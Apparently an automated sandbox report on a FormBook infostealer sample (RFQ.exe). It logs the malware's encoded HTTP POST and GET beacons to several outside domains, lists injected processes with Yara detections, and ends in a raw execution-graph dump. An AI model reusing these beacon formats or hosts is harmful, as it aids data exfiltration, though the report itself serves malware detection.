Data Ascii: L2m0Zn=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99sWs6YfoOP3m35YnqHKqjpDTGQaXk0gSSA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:17.900393963 CET | 657 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpngbXTjp3dbJMKiwyAV9beH3HuvBqAcr/s=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:20.458427906 CET | 10739 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:22.992609024 CET | 374 | OUT | GET /ezyn/?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.bio-thymus.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:54:24.558825970 CET | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 12 Nov 2024 07:54:24 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50040 | 47.52.221.88 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:30.273874998 CET | 637 | OUT | POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVQ8D8uqw7ZKAYtz9Jmny8jMsICC6l1J+pA==
Nov 12, 2024 08:54:31.225981951 CET | 390 | IN | HTTP/1.1 404 Not Found
Date: Tue, 12 Nov 2024 07:54:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50041 | 47.52.221.88 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:32.824914932 CET | 657 | OUT | POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujofVFLOo203yHOuMPcJmf3v4uJF/J+f2HQ=
Nov 12, 2024 08:54:33.780483007 CET | 390 | IN | HTTP/1.1 404 Not Found
Date: Tue, 12 Nov 2024 07:54:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50042 | 47.52.221.88 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:35.370755911 CET | 10739 | OUT | POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Timestamp:Nov 12, 2024 08:54:36.344410896 CET
                                                                          Bytes transferred:390
                                                                          Direction:IN
                                                                          Data:HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:36 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 179
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1


                                                                          Session ID:40
                                                                          Source IP:192.168.2.4
                                                                          Source Port:50043
                                                                          Destination IP:47.52.221.88
                                                                          Destination Port:80
                                                                          PID:2060
                                                                          Process:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp:Nov 12, 2024 08:54:37.918623924 CET
                                                                          Bytes transferred:374
                                                                          Direction:OUT
                                                                          Data:GET /9ezc/?JPc=NBQdBBkPWTStX&L2m0Zn=xtzn0DJhGGCFi+NGW0356zy9k0R5ayLej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pe4/4DLJl/A2P/VorJYWOIYL6GivXmTWJR8= HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.wukong.college
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Timestamp:Nov 12, 2024 08:54:38.899147987 CET
                                                                          Bytes transferred:390
                                                                          Direction:IN
                                                                          Data:HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:38 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 203
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                          Session ID:41
                                                                          Source IP:192.168.2.4
                                                                          Source Port:50044
                                                                          Destination IP:23.106.59.18
                                                                          Destination Port:80
                                                                          PID:2060
                                                                          Process:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp:Nov 12, 2024 08:54:44.759210110 CET
                                                                          Bytes transferred:658
                                                                          Direction:OUT
                                                                          Data:POST /95c0/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vehiculargustav.click
                                                                          Origin: http://www.vehiculargustav.click
                                                                          Referer: http://www.vehiculargustav.click/95c0/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5Ll/bRJv67Bk9FwvIDm0XVVhAk2G1JsJWECw==
                                                                          Timestamp:Nov 12, 2024 08:54:45.393728971 CET
                                                                          Bytes transferred:423
                                                                          Direction:IN
                                                                          Data:HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:42 GMT
                                                                          Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                          Content-Length: 203
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                          Target ID:0
                                                                          Start time:02:51:38
                                                                          Start date:12/11/2024
                                                                          Path:C:\Users\user\Desktop\RFQ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                          Imagebase:0x680000
                                                                          File size:1'604'608 bytes
                                                                          MD5 hash:B5E39C660B2E4F19CC14B94DF9B6497C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:02:51:39
                                                                          Start date:12/11/2024
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                          Imagebase:0xed0000
                                                                          File size:46'504 bytes
                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:02:51:45
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe"
                                                                          Imagebase:0x980000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:02:51:50
                                                                          Start date:12/11/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                          Imagebase:0xfb0000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:02:52:01
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe"
                                                                          Imagebase:0x980000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:02:52:13
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff6bf500000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:3%
                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                            Signature Coverage:4%
                                                                            Total number of Nodes:1614
                                                                            Total number of Limit Nodes:41
87445->87445 87446 684852 87972 686328 87446->87972 87450 683708 __wsopen_s 87449->87450 88204 685ce6 87450->88204 87452 68370d 87453 683787 87452->87453 88215 683c08 82 API calls 87452->88215 87453->87310 87455 68371a 87455->87453 88216 683a6d 84 API calls 87455->88216 87457 683723 87457->87453 87458 683727 GetFullPathNameW 87457->87458 87459 6884e7 22 API calls 87458->87459 87460 683753 87459->87460 87461 6884e7 22 API calls 87460->87461 87462 683760 87461->87462 87463 6c3323 87462->87463 87464 6884e7 22 API calls 87462->87464 87464->87453 88256 6846ff 7 API calls 87465->88256 87467 684555 87468 68468e CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87467->87468 87468->87325 87470 6856ed ___scrt_fastfail 87469->87470 88257 686092 87470->88257 87473 685773 87475 6c40bd Shell_NotifyIconW 87473->87475 87476 685791 Shell_NotifyIconW 87473->87476 88261 6857ae 87476->88261 87478 6857a7 87478->87332 87479->87331 87480->87310 87481->87321 87483 6c1ef0 __wsopen_s 87482->87483 87484 6858f2 GetModuleFileNameW 87483->87484 87485 68b606 22 API calls 87484->87485 87486 685918 87485->87486 87487 68592d 23 API calls 87486->87487 87488 685922 87487->87488 87488->87327 87490 6c3e1a 87489->87490 87491 6852ce 87489->87491 87492 69fd5b 22 API calls 87490->87492 88284 6852df 87491->88284 87494 6c3e24 _wcslen 87492->87494 87496 69fd8b 22 API calls 87494->87496 87495 6852d9 87495->87343 87497 6c3e5d __fread_nolock 87496->87497 87499 686492 __wsopen_s 87498->87499 87500 6884e7 22 API calls 87499->87500 87501 6864c4 87499->87501 87500->87501 87511 6864fa 87501->87511 87611 68660f 87501->87611 87503 68b606 22 API calls 87505 6865f4 87503->87505 87504 68b606 22 API calls 87504->87511 87507 686aff 22 API calls 87505->87507 87506 68660f 22 API calls 87506->87511 87509 686600 87507->87509 87509->87358 87510 6865cb 87510->87503 87510->87509 87511->87504 87511->87506 87511->87510 87614 686aff 87511->87614 87620 686832 LoadLibraryA 87512->87620 87517 6c487c 87519 6868db 68 API calls 
87517->87519 87518 686898 LoadLibraryExW 87628 6867fb LoadLibraryA 87518->87628 87521 6c4883 87519->87521 87523 6867fb 3 API calls 87521->87523 87525 6c488b 87523->87525 87650 686a95 87525->87650 87526 6868c2 87526->87525 87527 6868ce 87526->87527 87528 6868db 68 API calls 87527->87528 87530 6848d0 87528->87530 87530->87365 87530->87366 87533 6c48b2 87535 69fd5b 22 API calls 87534->87535 87536 6848fa 87535->87536 87536->87377 87538 68c122 87537->87538 87539 68c151 87538->87539 87793 68c28f 41 API calls 87538->87793 87539->87381 87542 684ab9 87541->87542 87543 684ad7 87541->87543 87544 684976 87542->87544 87546 68c1c3 22 API calls 87542->87546 87545 6884e7 22 API calls 87543->87545 87547 6a49b8 87544->87547 87545->87544 87546->87544 87548 6a4a3b 87547->87548 87549 6a49c6 87547->87549 87796 6a4a4d 40 API calls 3 library calls 87548->87796 87556 6a49eb 87549->87556 87794 6af269 20 API calls _abort 87549->87794 87552 6a4a48 87552->87402 87553 6a49d2 87795 6b277c 26 API calls pre_c_initialization 87553->87795 87555 6a49dd 87555->87402 87556->87402 87558 687d9b 87557->87558 87559 69fd5b 22 API calls 87558->87559 87560 687da9 87559->87560 87797 6883b0 87560->87797 87563 6883e0 87800 68c910 87563->87800 87565 69fd8b 22 API calls 87567 684a31 87565->87567 87566 6883f0 87566->87565 87566->87567 87568 688a30 87567->87568 87569 688a46 87568->87569 87570 6c58e4 87569->87570 87575 688a50 87569->87575 87809 6821a5 22 API calls 87570->87809 87571 6c58f1 87810 68c5e7 23 API calls messages 87571->87810 87574 6c590f 87574->87574 87575->87571 87576 688b64 87575->87576 87578 688b6b 87575->87578 87577 69fd5b 22 API calls 87576->87577 87577->87578 87578->87430 87580 6f2c33 87579->87580 87581 686abf 64 API calls 87580->87581 87582 6f2c47 87581->87582 87811 6f2d84 87582->87811 87585 6f2c5d 87585->87368 87586 686a95 40 API calls 87587 6f2c74 87586->87587 87588 686a95 40 API calls 87587->87588 87589 6f2c84 87588->87589 87590 686a95 40 API calls 87589->87590 87591 6f2c9f 87590->87591 87592 
686a95 40 API calls 87591->87592 87593 6f2cba 87592->87593 87594 686abf 64 API calls 87593->87594 87595 6f2cd1 87594->87595 87596 6ae99c ___std_exception_copy 21 API calls 87595->87596 87597 6f2cd8 87596->87597 87598 6ae99c ___std_exception_copy 21 API calls 87597->87598 87599 6f2ce2 87598->87599 87600 686a95 40 API calls 87599->87600 87601 6f2cf6 87600->87601 87602 6f281c 27 API calls 87601->87602 87603 6f2d0c 87602->87603 87603->87585 87817 6f21ec 87603->87817 87606 6868ec 87605->87606 87607 6868e5 87605->87607 87609 6868fb 87606->87609 87610 68690c FreeLibrary 87606->87610 87608 6ae608 67 API calls 87607->87608 87608->87606 87609->87370 87610->87609 87612 68c7c9 22 API calls 87611->87612 87613 68661a 87612->87613 87613->87501 87615 686b0e 87614->87615 87619 686b2f __fread_nolock 87614->87619 87618 69fd8b 22 API calls 87615->87618 87616 69fd5b 22 API calls 87617 686b42 87616->87617 87617->87511 87618->87619 87619->87616 87621 686868 87620->87621 87622 68684a GetProcAddress 87620->87622 87625 6ae57b 87621->87625 87623 68685a 87622->87623 87623->87621 87624 686861 FreeLibrary 87623->87624 87624->87621 87658 6ae4ba 87625->87658 87627 68688c 87627->87517 87627->87518 87629 68682f 87628->87629 87630 686810 GetProcAddress 87628->87630 87633 686920 87629->87633 87631 686820 87630->87631 87631->87629 87632 686828 FreeLibrary 87631->87632 87632->87629 87634 69fd8b 22 API calls 87633->87634 87635 686935 87634->87635 87719 6870c2 87635->87719 87637 686941 __fread_nolock 87638 6c48ca 87637->87638 87639 686a45 87637->87639 87649 68697c 87637->87649 87733 6f2f6b 74 API calls 87638->87733 87722 686122 CreateStreamOnHGlobal 87639->87722 87642 6c48cf 87644 686abf 64 API calls 87642->87644 87643 686a95 40 API calls 87643->87649 87645 6c48f2 87644->87645 87646 686a95 40 API calls 87645->87646 87648 686a0e messages 87646->87648 87648->87526 87649->87642 87649->87643 87649->87648 87728 686abf 87649->87728 87651 686aa7 87650->87651 87654 6c491d 87650->87654 87755 6ae854 87651->87755 
87655 6f281c 87776 6f266c 87655->87776 87657 6f2837 87657->87533 87659 6ae4c6 ___BuildCatchObject 87658->87659 87660 6ae4d4 87659->87660 87663 6ae504 87659->87663 87683 6af269 20 API calls _abort 87660->87683 87662 6ae4d9 87684 6b277c 26 API calls pre_c_initialization 87662->87684 87665 6ae509 87663->87665 87666 6ae516 87663->87666 87685 6af269 20 API calls _abort 87665->87685 87675 6b8001 87666->87675 87669 6ae51f 87670 6ae532 87669->87670 87671 6ae525 87669->87671 87687 6ae564 LeaveCriticalSection __fread_nolock 87670->87687 87686 6af269 20 API calls _abort 87671->87686 87673 6ae4e4 __wsopen_s 87673->87627 87676 6b800d ___BuildCatchObject 87675->87676 87688 6b2eee EnterCriticalSection 87676->87688 87678 6b801b 87689 6b809b 87678->87689 87682 6b804c __wsopen_s 87682->87669 87683->87662 87684->87673 87685->87673 87686->87673 87687->87673 87688->87678 87698 6b80be 87689->87698 87690 6b8028 87703 6b8057 87690->87703 87691 6b8117 87708 6b4c0d 20 API calls 2 library calls 87691->87708 87693 6b8120 87709 6b2958 87693->87709 87696 6b8129 87696->87690 87715 6b3395 11 API calls 2 library calls 87696->87715 87698->87690 87698->87691 87706 6a911d EnterCriticalSection 87698->87706 87707 6a9131 LeaveCriticalSection 87698->87707 87699 6b8148 87716 6a911d EnterCriticalSection 87699->87716 87702 6b815b 87702->87690 87718 6b2f36 LeaveCriticalSection 87703->87718 87705 6b805e 87705->87682 87706->87698 87707->87698 87708->87693 87710 6b2963 RtlFreeHeap 87709->87710 87714 6b298c _free 87709->87714 87711 6b2978 87710->87711 87710->87714 87717 6af269 20 API calls _abort 87711->87717 87713 6b297e GetLastError 87713->87714 87714->87696 87715->87699 87716->87702 87717->87713 87718->87705 87720 69fd5b 22 API calls 87719->87720 87721 6870d4 87720->87721 87721->87637 87723 686159 87722->87723 87724 68613c FindResourceExW 87722->87724 87723->87649 87724->87723 87725 6c42f1 LoadResource 87724->87725 87725->87723 87726 6c4306 SizeofResource 87725->87726 87726->87723 87727 6c431a LockResource 
87726->87727 87727->87723 87729 6c493d 87728->87729 87730 686ace 87728->87730 87734 6aec73 87730->87734 87733->87642 87737 6aea3a 87734->87737 87736 686adc 87736->87649 87740 6aea46 ___BuildCatchObject 87737->87740 87738 6aea52 87750 6af269 20 API calls _abort 87738->87750 87739 6aea78 87752 6a911d EnterCriticalSection 87739->87752 87740->87738 87740->87739 87743 6aea57 87751 6b277c 26 API calls pre_c_initialization 87743->87751 87745 6aea84 87753 6aeb9a 62 API calls 2 library calls 87745->87753 87747 6aea98 87754 6aeab7 LeaveCriticalSection __fread_nolock 87747->87754 87749 6aea62 __wsopen_s 87749->87736 87750->87743 87751->87749 87752->87745 87753->87747 87754->87749 87758 6ae871 87755->87758 87757 686ab8 87757->87655 87759 6ae87d ___BuildCatchObject 87758->87759 87760 6ae8bd 87759->87760 87761 6ae890 ___scrt_fastfail 87759->87761 87762 6ae8b5 __wsopen_s 87759->87762 87773 6a911d EnterCriticalSection 87760->87773 87771 6af269 20 API calls _abort 87761->87771 87762->87757 87764 6ae8c7 87774 6ae688 38 API calls 4 library calls 87764->87774 87767 6ae8aa 87772 6b277c 26 API calls pre_c_initialization 87767->87772 87768 6ae8de 87775 6ae8fc LeaveCriticalSection __fread_nolock 87768->87775 87771->87767 87772->87762 87773->87764 87774->87768 87775->87762 87779 6ae478 87776->87779 87778 6f267b 87778->87657 87782 6ae3f9 87779->87782 87781 6ae495 87781->87778 87783 6ae408 87782->87783 87784 6ae41c 87782->87784 87790 6af269 20 API calls _abort 87783->87790 87789 6ae418 __alldvrm 87784->87789 87792 6b32cf 11 API calls 2 library calls 87784->87792 87786 6ae40d 87791 6b277c 26 API calls pre_c_initialization 87786->87791 87789->87781 87790->87786 87791->87789 87792->87789 87793->87539 87794->87553 87795->87555 87796->87552 87798 69fd5b 22 API calls 87797->87798 87799 684a23 87798->87799 87799->87563 87801 68c91b 87800->87801 87802 6d0728 87801->87802 87807 68c923 messages 87801->87807 87803 69fd5b 22 API calls 87802->87803 87806 6d0734 87803->87806 87804 68c92a 87804->87566 
87806->87806 87807->87804 87808 68c990 22 API calls messages 87807->87808 87808->87807 87809->87571 87810->87574 87814 6f2d98 87811->87814 87812 6f281c 27 API calls 87812->87814 87813 6f2c59 87813->87585 87813->87586 87814->87812 87814->87813 87815 686a95 40 API calls 87814->87815 87816 686abf 64 API calls 87814->87816 87815->87814 87816->87814 87818 6f21f7 87817->87818 87819 6f2205 87817->87819 87820 6ae57b 29 API calls 87818->87820 87821 6f224a 87819->87821 87822 6ae57b 29 API calls 87819->87822 87845 6f220e 87819->87845 87820->87819 87846 6f2475 40 API calls __fread_nolock 87821->87846 87824 6f222f 87822->87824 87824->87821 87826 6f2238 87824->87826 87825 6f228e 87827 6f22b3 87825->87827 87828 6f2292 87825->87828 87826->87845 87854 6ae608 87826->87854 87847 6f208f 87827->87847 87829 6f229f 87828->87829 87832 6ae608 67 API calls 87828->87832 87836 6ae608 67 API calls 87829->87836 87829->87845 87832->87829 87833 6f22bb 87834 6f22e1 87833->87834 87835 6f22c1 87833->87835 87867 6f2311 74 API calls 87834->87867 87837 6f22ce 87835->87837 87839 6ae608 67 API calls 87835->87839 87836->87845 87840 6ae608 67 API calls 87837->87840 87837->87845 87839->87837 87840->87845 87841 6f22fc 87844 6ae608 67 API calls 87841->87844 87841->87845 87842 6f22e8 87842->87841 87843 6ae608 67 API calls 87842->87843 87843->87841 87844->87845 87845->87585 87846->87825 87848 6ae99c ___std_exception_copy 21 API calls 87847->87848 87849 6f209d 87848->87849 87850 6ae99c ___std_exception_copy 21 API calls 87849->87850 87851 6f20ae 87850->87851 87852 6ae99c 